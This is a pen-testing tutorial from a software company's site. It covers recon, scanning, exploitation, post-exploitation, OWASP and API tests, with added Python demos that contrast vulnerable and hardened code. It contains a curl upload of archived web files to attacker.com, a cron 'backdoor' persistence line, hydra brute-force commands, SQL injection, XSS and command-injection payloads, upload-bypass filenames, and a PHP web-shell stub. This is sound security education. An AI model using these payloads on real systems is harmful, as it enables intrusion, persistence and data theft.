Cesa Yazılım

Penetration Testing Guide 2025: Vulnerability Detection

How is penetration testing done? Web, network and API security tests, pen test tools and methodologies.

Penetration Testing Guide 2025

Penetration testing is the art of testing a system's security from the attacker's point of view. In this comprehensive guide you will learn professional pen testing methodologies and tools.

What Is Penetration Testing?

Penetration Testing (Pen Test):
Simulating real attack scenarios, under written authorization, to identify security vulnerabilities in systems before a real attacker does.

Goals:

Pen Test Types

1. Black Box Testing: the tester starts with no internal knowledge (no source code, credentials or architecture diagrams), which mirrors an external attacker.

2. White Box Testing: the tester has full knowledge, including source code, configuration and credentials, which gives the deepest coverage per hour of testing.

3. Gray Box Testing: partial knowledge, typically a normal user account plus a description of the architecture; the usual model for authenticated web and API tests.

Pen Test Methodology

Phase 1: Reconnaissance

# Passive reconnaissance (no packets sent to the target itself)
# Whois lookup: registrar, contacts, name servers, netblocks
whois target.com

# DNS enumeration
dig target.com ANY            # many resolvers refuse or minimise ANY (RFC 8482); query types explicitly:
dig target.com A AAAA MX NS TXT
nslookup target.com

# Google dorking (typed into the search engine, not a shell)
site:target.com filetype:pdf
site:target.com inurl:admin

# Shodan search (shodan CLI; needs an API key configured once with: shodan init <key>)
shodan search "target.com"

# Active reconnaissance (touches the target; only within the authorised scope)
# Port scanning: SYN scan (needs root), version and OS detection, all 65535 TCP ports
nmap -sS -sV -O -p- target.com

# Service enumeration: default NSE scripts against the web ports found above
nmap -sC -sV -p 80,443 target.com

# Subdomain enumeration
sublist3r -d target.com
amass enum -d target.com

Phase 2: Scanning & Enumeration

# Vulnerability scanning (NSE "vuln" category; noisy and prone to false positives, verify every hit manually)
nmap --script vuln target.com

# Web app scanning
nikto -h https://target.com

# SSL/TLS testing (protocol versions, cipher suites, certificate problems)
sslscan target.com
testssl.sh target.com

# Directory bruteforcing
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt

# Technology fingerprinting (server, frameworks, CMS and their versions)
whatweb target.com
wappalyzer https://target.com      # wappalyzer npm CLI; the browser extension gives the same result interactively
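The scan output from this phase is what drives everything that follows, so in practice it is saved with `-oX` and parsed rather than read by eye. The following is an added example (not code from the original page) that turns nmap XML into an inventory of open ports and flags the services a tester looks at first; the XML is a constructed sample in nmap's real `-oX` layout, and the `NOTABLE` table is this example's own triage list, not an nmap feature.

```python
"""Service inventory from `nmap -sV -oX scan.xml` output (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample of what nmap -sV writes for one host with three ports.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sS -sV -p- -oX scan.xml target.com">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="203.0.113.10" addrtype="ipv4"/>
    <hostnames><hostname name="target.com" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="nginx" version="1.18.0" tunnel="ssl" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="filtered" reason="no-response"/>
        <service name="ms-wbt-server" method="table" conf="3"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# This example's own triage hints (service name -> what to check next).
NOTABLE = {
    "ssh": "password brute force, outdated OpenSSH",
    "ms-wbt-server": "RDP exposed: NLA, brute force",
    "microsoft-ds": "SMB: enum4linux, signing, patch level",
    "ftp": "anonymous login, cleartext credentials",
    "telnet": "cleartext credentials",
    "mysql": "remote root, weak credentials",
}


def parse_nmap_xml(xml_text: str) -> list[dict]:
    """Return one record per OPEN port: host, port, service, version, TLS."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address").get("addr")
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else addr
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # closed/filtered ports are noise for the next phase
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(filter(None, [svc.get("product"), svc.get("version")]))
            records.append({
                "host": hostname,
                "addr": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "?") if svc is not None else "?",
                "product": product,
                "tls": svc is not None and svc.get("tunnel") == "ssl",
                # method="probed" means nmap actually fingerprinted the banner;
                # method="table" is only a guess from the port number.
                "fingerprinted": svc is not None and svc.get("method") == "probed",
            })
    return records


def triage(records: list[dict]) -> list[str]:
    """Flag services that deserve manual attention in the enumeration phase."""
    notes = []
    for r in records:
        if r["service"] in NOTABLE:
            notes.append(f"{r['host']}:{r['port']} {r['service']} ({r['product']}) -> {NOTABLE[r['service']]}")
        if r["service"] == "http" and not r["tls"]:
            notes.append(f"{r['host']}:{r['port']} plaintext HTTP -> check redirect to HTTPS, credentials in clear")
    return notes


if __name__ == "__main__":
    inventory = parse_nmap_xml(SAMPLE_NMAP_XML)
    for r in inventory:
        print(f"{r['addr']}:{r['port']}/{r['proto']:<3} {r['service']:<14} {r['product']}")
    for note in triage(inventory):
        print("  !", note)
```

Filtered ports (3389 in the sample) are dropped on purpose: they tell you a firewall is in the way, not that a service is reachable, and keeping them in the list inflates the attack surface handed to the exploitation phase.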

Phase 3: Exploitation

Web Application Attacks:

# SQL Injection: the classic tautology payload, URL-encoded so the request is well-formed
import urllib.parse
payload = "' OR '1'='1' --"
url = f"https://target.com/login?user={urllib.parse.quote(payload)}"

# XSS (Cross-Site Scripting): proof-of-concept payload for reflected or stored XSS
xss_payload = "<script>alert('XSS')</script>"

# Command Injection: chains a second command onto whatever the server executes
cmd_payload = "; ls -la"

# File Upload Exploit
# Bypass filters (each name defeats a different weak check)
shell.php.jpg        # double extension: passes a "must end with .jpg" check; executes where .php anywhere in the name is handled (e.g. Apache AddHandler)
shell.pHp            # case variation: passes a case-sensitive ".php" blocklist
shell.php%00.jpg     # null byte: truncates the name to shell.php in code that treats it as a C string (PHP before 5.3.4)
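The three upload filenames above are only useful if you understand which check each one beats, so here is an added example (not code from the original page) that runs them against a typical broken filter and against a hardened one. The filter functions, the extension allowlist and the magic-byte table are this example's assumptions; the web-shell stub and JPEG header bytes are constructed inline.

```python
"""Upload filter: the page's three bypass names vs a naive and a hardened check."""
import re
from typing import Optional
from urllib.parse import unquote

# Allowed extensions and the file signature each one must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}
# Exactly one dot, a restricted charset, and nothing attacker-shaped survives.
SAFE_NAME = re.compile(r"^[a-z0-9_-]{1,64}\.([a-z0-9]{1,5})$")

# The three names from the page plus one legitimate upload.
PAYLOADS = ["shell.php.jpg", "shell.pHp", "shell.php%00.jpg", "holiday.JPG"]
PHP_STUB = b"<?php system($_GET['cmd']); ?>"        # constructed web-shell body
JPEG_STUB = b"\xff\xd8\xff\xe0" + b"\x00" * 16        # constructed JPEG header


def naive_filter(filename: str) -> bool:
    """Typical broken filter: a case-sensitive blocklist on the '.php' suffix."""
    return not filename.endswith(".php")


def hardened_filter(filename: str, content: bytes) -> Optional[str]:
    """Return the extension to store the file under, or None to reject it.

    The caller should then save it under a random name (secrets.token_hex)
    outside the web root; nothing attacker-controlled reaches the filesystem.
    """
    name = unquote(filename)               # check the decoded form the OS will see
    if "\x00" in name or "/" in name or "\\" in name:
        return None                        # null-byte truncation, path traversal
    m = SAFE_NAME.match(name.lower())      # case-folded, single extension only
    if not m:
        return None                        # 'shell.php.jpg' has two dots: rejected
    ext = m.group(1)
    if ext not in ALLOWED:
        return None                        # allowlist, so 'pHp' is just 'php'
    if not content.startswith(ALLOWED[ext]):
        return None                        # magic bytes must match the claimed type
    return ext


def run_demo() -> dict:
    """Map each filename to (accepted by naive filter, extension from hardened filter)."""
    results = {}
    for name in PAYLOADS:
        content = JPEG_STUB if name == "holiday.JPG" else PHP_STUB
        results[name] = (naive_filter(name), hardened_filter(name, content))
    return results


if __name__ == "__main__":
    for name, (naive_ok, hardened_ext) in run_demo().items():
        print(f"{name:<18} naive: {'ACCEPT' if naive_ok else 'reject':<7} "
              f"hardened: {'store as .' + hardened_ext if hardened_ext else 'reject'}")
```

Note the order of checks in the hardened version: decode first, reject structural problems, then allowlist, then verify content. A filter that checks the raw, still-encoded name is exactly what the `%00` variant exploits.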

Network Attacks:

# SMB enumeration: shares, users, groups and password policy over null/guest sessions
enum4linux target.com

# SSH brute force (account lockout policies apply; agree the wordlist and rate with the client first)
hydra -l admin -P passwords.txt ssh://target.com

# RDP brute force
hydra -l administrator -P passwords.txt rdp://target.com

Phase 4: Post-Exploitation

# Privilege escalation: sudo rules for the current user, then SUID binaries
sudo -l
find / -perm -4000 -type f 2>/dev/null

# Persistence (`crontab -` REPLACES the whole crontab; append to the existing entries instead of wiping them)
(crontab -l 2>/dev/null; echo "* * * * * /tmp/backdoor.sh") | crontab -

# Data exfiltration (only as agreed in scope; in a real engagement exfiltrate a marker file, not customer data)
tar -czf data.tar.gz /var/www/html
curl -F "file=@data.tar.gz" https://attacker.com/upload

# Lateral movement: push a key to another host (ssh-copy-id still needs that host's password or an existing key)
ssh-keygen -t rsa
ssh-copy-id user@another-host

Phase 5: Reporting

Report Contents:

  1. Executive Summary
  2. Methodology
  3. Findings
    • Critical
    • High
    • Medium
    • Low
  4. Detailed Findings
  5. Remediation Recommendations
  6. Appendices

Essential Pen Test Tools

1. Reconnaissance

2. Web Application

3. Exploitation

4. Wireless

5. Password Cracking

OWASP Top 10 Testing

1. Broken Access Control

// Test authorization bypass
// Normal user trying admin endpoint
GET /admin/users HTTP/1.1
Cookie: session=user_token

// IDOR (Insecure Direct Object Reference)
GET /api/user/123/profile  // My profile
GET /api/user/124/profile  // Can I access others?

2. Cryptographic Failures

# Test SSL/TLS
testssl.sh --vulnerable target.com

# Check for weak ciphers
nmap --script ssl-enum-ciphers -p 443 target.com

3. Injection

-- SQL Injection tests
' OR '1'='1
admin' --
' UNION SELECT NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT 'admin','password'--
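The four payloads above (and the one used in the Phase 3 exploitation section) each do something different to the query, which is easiest to see against a real database. The following is an added example (not code from the original page) that runs them against a login check built by string concatenation and then against the parameterized version the remediation section recommends; the `users` table and its rows are constructed in memory with SQLite.

```python
"""The page's SQL injection payloads against concatenated vs parameterized SQL."""
import sqlite3

PAYLOADS = [
    "' OR '1'='1' --",                                   # tautology: matches every row
    "admin' --",                                         # comments out the password check
    "' UNION SELECT NULL,NULL,NULL--",                   # column-count probe (wrong count -> error)
    "' AND 1=0 UNION ALL SELECT 'admin','password'--",   # attacker supplies the returned row
]


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table; admin is the first row on purpose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "correct horse battery", "admin"),
        ("alice", "hunter2", "user"),
    ])
    return conn


def login_vulnerable(conn, username: str, password: str):
    # Vulnerable: user input is spliced into the SQL text, so quotes and the
    # SQLite comment marker `--` change the statement's structure.
    query = (f"SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()


def login_fixed(conn, username: str, password: str):
    # Fixed: placeholders keep the input as data; the grammar is fixed at parse time.
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def run_payloads(login, conn) -> dict:
    """Send every payload as the username with a wrong password; record the outcome."""
    results = {}
    for p in PAYLOADS:
        try:
            results[p] = login(conn, p, "wrong-password")
        except sqlite3.Error as e:
            results[p] = f"error: {e}"      # a database error leaking to the user is itself a finding
    return results


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", login_vulnerable), ("fixed", login_fixed)):
        print(f"== {name} ==")
        for payload, outcome in run_payloads(fn, db).items():
            print(f"  {payload!r:<52} -> {outcome}")
```

Two details worth noting when you move from SQLite to the real target: the column-count probe errors here because the query selects two columns, which is exactly how UNION-based enumeration works (you add `NULL`s until the error goes away), and `--` is a comment in SQLite without a trailing space, whereas MySQL needs `-- ` with a space after it.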

4. Insecure Design

5. Security Misconfiguration

# Default credentials
admin:admin
admin:password
root:toor

# Directory listing
https://target.com/.git/
https://target.com/backup/

# Debug mode
https://target.com/?debug=true

API Penetration Testing

# API enumeration: allowed methods and CORS headers
curl -X OPTIONS https://api.target.com/

# Authentication bypass: an invalid or missing token must yield 401/403, never data
curl -H "Authorization: Bearer invalid_token" https://api.target.com/admin

# Rate limit testing: collect the status codes; a correctly limited API starts answering 429
for i in {1..1000}; do
  curl -s -o /dev/null -w "%{http_code}\n" https://api.target.com/api/endpoint &
done | sort | uniq -c

# Mass assignment: does the server honour a field the client should never set?
curl -X POST https://api.target.com/api/users \
  -H "Content-Type: application/json" \
  -d '{"username":"test","role":"admin"}'
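The IDOR probe from the Broken Access Control section and the mass-assignment probe above are the same test pattern: an authenticated baseline request, then the same request with one thing changed (another user's id, an extra `role` field), and a decision based on the status code and body. The following is an added example (not code from the original page) that implements both probes and runs them against an in-process mock API so it works offline; the mock API, its session tokens, its user table and the `secure` switch that toggles between the flawed and the fixed handler are all this example's constructions.

```python
"""IDOR and mass-assignment probes against an in-process mock API (added example)."""
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

SESSIONS = {"user_token": 123, "other_token": 124}           # constructed
USERS = {123: {"name": "alice", "role": "user"},             # constructed
         124: {"name": "bob", "role": "user"}}


def make_handler(secure: bool):
    """secure=False reproduces both flaws; secure=True applies the fixes."""
    class Api(BaseHTTPRequestHandler):
        def log_message(self, *_):            # silence per-request logging
            pass

        def _send(self, code, body):
            data = json.dumps(body).encode()
            self.send_response(code)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def _caller(self):                     # user id behind the session cookie
            cookies = dict(p.strip().split("=", 1)
                           for p in self.headers.get("Cookie", "").split(";") if "=" in p)
            return SESSIONS.get(cookies.get("session"))

        def do_GET(self):                      # GET /api/user/<id>/profile
            parts = self.path.strip("/").split("/")
            if (len(parts) != 4 or parts[:2] != ["api", "user"]
                    or parts[3] != "profile" or not parts[2].isdigit()):
                return self._send(404, {"error": "not found"})
            uid, caller = int(parts[2]), self._caller()
            if caller is None:
                return self._send(401, {"error": "login required"})
            if secure and caller != uid:       # fix: the object must belong to the caller
                return self._send(403, {"error": "forbidden"})
            if uid not in USERS:
                return self._send(404, {"error": "no such user"})
            self._send(200, USERS[uid])        # vulnerable path: any id is served

        def do_POST(self):                     # POST /api/users
            if self.path != "/api/users":
                return self._send(404, {"error": "not found"})
            raw = self.rfile.read(int(self.headers.get("Content-Length", 0)))
            body = json.loads(raw or b"{}")
            user = {"name": body.get("username")}
            # Vulnerable: privilege is copied from the request body (mass assignment).
            # Fix: bind only allowlisted fields; the server assigns the role.
            user["role"] = "user" if secure else body.get("role", "user")
            new_id = max(USERS) + 1
            USERS[new_id] = user
            self._send(201, {"id": new_id, **user})
    return Api


def start_server(secure: bool):
    srv = HTTPServer(("127.0.0.1", 0), make_handler(secure))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def _request(url, method="GET", headers=None, body=None):
    req = Request(url, data=body, method=method, headers=headers or {})
    try:
        with urlopen(req, timeout=5) as r:
            return r.status, json.loads(r.read())
    except HTTPError as e:                     # a 4xx is a result, not a failure
        return e.code, json.loads(e.read())


def probe_idor(base, session, own_id, other_id) -> bool:
    """True if my session can read someone else's profile (Broken Access Control)."""
    hdr = {"Cookie": f"session={session}"}
    assert _request(f"{base}/api/user/{own_id}/profile", headers=hdr)[0] == 200, "baseline failed"
    return _request(f"{base}/api/user/{other_id}/profile", headers=hdr)[0] == 200


def probe_mass_assignment(base) -> bool:
    """True if an unexpected 'role' field is honoured when creating a user."""
    payload = json.dumps({"username": "test", "role": "admin"}).encode()
    code, body = _request(f"{base}/api/users", "POST",
                          {"Content-Type": "application/json"}, payload)
    return code == 201 and body.get("role") == "admin"


if __name__ == "__main__":
    for secure in (False, True):
        srv, base = start_server(secure)
        print("secure" if secure else "vulnerable",
              "IDOR:", probe_idor(base, "user_token", 123, 124),
              "mass assignment:", probe_mass_assignment(base))
        srv.shutdown()
        srv.server_close()
```

The baseline assertion in `probe_idor` matters: if your own profile request fails, a 403 on the other id proves nothing about authorization, only that the session is broken. Against a real API point `base` at the target and reuse the same two functions.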

Mobile App Testing

# Android APK analysis
apktool d app.apk            # decode resources, AndroidManifest.xml and smali
jadx app.apk                 # decompile to Java source (jadx-gui for interactive browsing)

# iOS IPA analysis (unzip the .ipa first; class-dump needs the decrypted binary)
class-dump -H App.app/App

# Traffic interception
# Configure proxy (Burp/Charles)
# Install CA certificate (Android 7+ apps do not trust user-installed CAs by default: root the device or patch the app's network_security_config)
# Intercept HTTPS traffic (certificate pinning has to be bypassed first, e.g. with a Frida script)

# Reverse engineering
# Frida for runtime manipulation: -U = USB device, -f = spawn the app by package name
frida -U -f com.app.package

Report Template

# Penetration Test Report

## Executive Summary
- Test dates: DD/MM/YYYY
- Scope: target.com
- Findings: X critical, Y high, Z medium

## Risk Rating
Critical: 3
High: 5
Medium: 8
Low: 12

## Key Findings

### 1. SQL Injection (CRITICAL)
**Description:** SQL injection vulnerability in login form
**Impact:** Full database access, data breach
**Evidence:**
- URL: https://target.com/login.php
- Payload: ' OR '1'='1' --
- Screenshot: [attached]

**Recommendation:**
- Use prepared statements
- Input validation
- WAF implementation

### 2. XSS (HIGH)
...

## Conclusion
...

Best Practices

Ethics:

Technical:

Reporting:

Legal Notice

⚠️ IMPORTANT:
Penetration testing must only be performed on systems you are authorized to test. Unauthorized pen testing is a crime with serious legal consequences.

Required Documentation:

Conclusion

Penetration testing is a continuous process:

  1. Test
  2. Report
  3. Fix
  4. Repeat

Pen Test Frequency:


Contact us for professional penetration testing services! 🔐

📧 iletisim@cesayazilim.com
📞 +90 850 225 53 34